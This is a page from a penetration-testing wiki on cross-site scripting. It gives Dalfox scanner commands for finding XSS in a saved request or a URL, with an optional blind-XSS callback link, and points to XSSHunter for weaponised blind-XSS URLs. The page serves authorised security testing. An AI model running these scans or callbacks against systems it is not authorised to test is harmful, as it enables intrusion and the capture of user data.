Pentest List Wiki
  • What is Pentest List Wiki?
  • OFFENSIVE SECURITY
    • External Infrastructure
      • Discovery
        • Email Address Discovery
        • Subdomain Discovery
        • Data Discovery
        • Port & Service Discovery
      • Exploitation
        • Password Spraying
        • Vulnerability Scanning
    • Internal Infrastructure
      • General Discovery
        • AD Attack Path Discovery
        • Port & Service Discovery
      • Credential Discovery
        • Passwords and NetNTLM
        • SAM & LSA secrets
        • NTDS.dit secrets
        • LSASS secrets
        • DCSync
        • DPAPI secrets
      • Movement
        • Credential Spraying
        • SMB Relaying
        • Pass The Hash
      • Infiltration/Exfiltration
        • Pivoting (Proxying)
    • Web Application
      • Discovery
        • Testing API Keys
        • Vulnerability Scan
        • Web Content Discovery
        • Parameter Discovery
        • VHOST Discovery
        • CMS Scanners
      • Exploitation
        • Authentication
          • Email Address Forms
          • AWS Cognito
        • JSON Web Tokens
        • Injection Attacks
          • SQL Injection
          • Cross-Site Scripting
          • HTTP Headers
      • Bypasses
        • Cloudflare Bypass
        • HTTP 403 Bypass
    • Mobile (iOS/Android)
      • iOS
        • IPA Decryption
        • Filesystem Analysis
        • Static Analysis
    • Cloud
      • AWS
        • Vulnerability Scanners
        • S3 Buckets
      • Azure
        • Vulnerability Scanners
        • m365 & Entra ID
  • DEFENSIVE SECURITY
    • Forged Kerberos Tickets
    • Logon Event Visualisation
Powered by GitBook
On this page
  • Standard XSS
  • Dalfox
  • Blind XSS
  • XSSHunter
  1. OFFENSIVE SECURITY
  2. Web Application
  3. Exploitation
  4. Injection Attacks

Cross-Site Scripting

How to exploit cross-site scripting (XSS).

PreviousSQL InjectionNextHTTP Headers

Last updated 11 months ago

Standard XSS

Dalfox

Dalfox is a powerful open-source XSS scanner and utility focused on automation.

The following command will take a HTTP request saved to a file named HTTPREQUEST and look for XSS, including blind XSS if you use the -b flag with a blind XSS URL.

dalfox file --rawdata HTTPREQUEST -b <blind_xss_link>

The following command will take a URL and look for XSS, including blind XSS if you use the -b flag with a blind XSS URL.

dalfox url URL -b <blind_xss_link>

Blind XSS

XSSHunter

XSSHunter provides a weaponised URL to insert into XSS payloads to test for blind XSS. The easiest way to use XSSHunter, is by using TruffleSecuritys own platform.

For those that are more security and privacy conscious. You may wish to setup a private instance:

https://github.com/hahwul/dalfox
https://xsshunter.trufflesecurity.com/app/#/
https://github.com/trufflesecurity/xsshunter